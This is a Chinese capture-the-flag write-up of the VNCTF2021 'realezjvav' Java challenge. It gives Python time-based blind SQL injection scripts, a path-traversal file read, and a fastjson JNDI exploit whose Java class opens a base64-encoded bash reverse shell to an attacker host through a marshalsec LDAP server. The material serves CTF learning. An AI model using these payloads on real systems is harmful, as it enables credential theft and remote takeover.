VNCTF2021 realezjvav复现(fastjson漏洞利用)

VNCTF2021 realezjvav复现

漏洞点:

sql注入

fastjson漏洞(学到了学到了ORZ)

参考

官方wp

红队武器库:fastjson小于1.2.68全漏洞RCE利用exp

bfengj师傅

复现过程

根据页面提示(Only the admin can get the right page) 以及源码，提示是sql注入，确定了用户名为admin，密码用test’ 报错500 用test’ # 正常200，fuzz下以及看师傅们的wp，知道要用笛卡儿积盲注

payload1:

import requests
from time import *

url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=""
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if j==min:
            flag+=chr(j)
            print(flag)
            break
        payload="-1'or if(ascii(substr(password,{},1))<{},(SELECT count(*) FROM information_schema.tables A,information_schema.tables B,information_schema.tables C),1)#".format(i,j)
        data={
            'username':'admin',
            'password':payload
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.7)
            min=j
        except:
            max=j
        sleep(0.4)

           

payload2:

import requests
url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=''
for i in range(1,50):
    f1=flag
    top=127
    low=33
    while low<=top:
        mid=(top+low)//2
        # p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        # p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        data1={'username':'admin','password':p1}
        data2={'username':'admin','password':p2}
        try:
            print(i,mid)
            r1=requests.post(url,data=data1,timeout=1)
        except requests.exceptions.ReadTimeout as e:
            flag+=chr(mid)
            print(flag)
            break
        except Exception as e:
            pass
        else:
            try:
                r2=requests.post(url,data=data2,timeout=1)
            except requests.exceptions.ReadTimeout as e:
                low=mid+1
            except Exception as e:
                pass
            else:
                top=mid-1
    if flag==f1:
        break
           

得 no_0ne_kn0w_th1s

登录后有个创建角色功能，以及源码上有个读文件的，尝试任意文件读取 读pom.xml

/searchimage?img=…/…/…/…/…/pom.xml

网上找payload

Fastjson < 1.2.68

Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有

具体原理在参考第一条上。

复现的时候用rmi协议一直没成功，参考wp用了ldap协议可以成功执行命令

记录下详细步骤

先创建个Exploit.java

public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec(
                    "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwL2lwLzg3NjUgMD4mMQ==}|{base64,-d}|{bash,-i}");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}

           

base64的地方换成自己的vps来反弹shell 我这里用的是8765 端口进行反弹

javac Exploit.java 生成 Exploit.class 文件

并在当前目录下

接着我们要去github上下载个

marshalsec

下载好了构建一下

mvn clean package -DskipTests
           

进入target目录，开启ldap服务：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ip:8888/#Exploit" 9999
           

嫌麻烦的可以尝试用下这个师傅写的工具 一键搭建

工具

只需要在服务器上

最后POST请求的payload

用unicode来绕过

成功反弹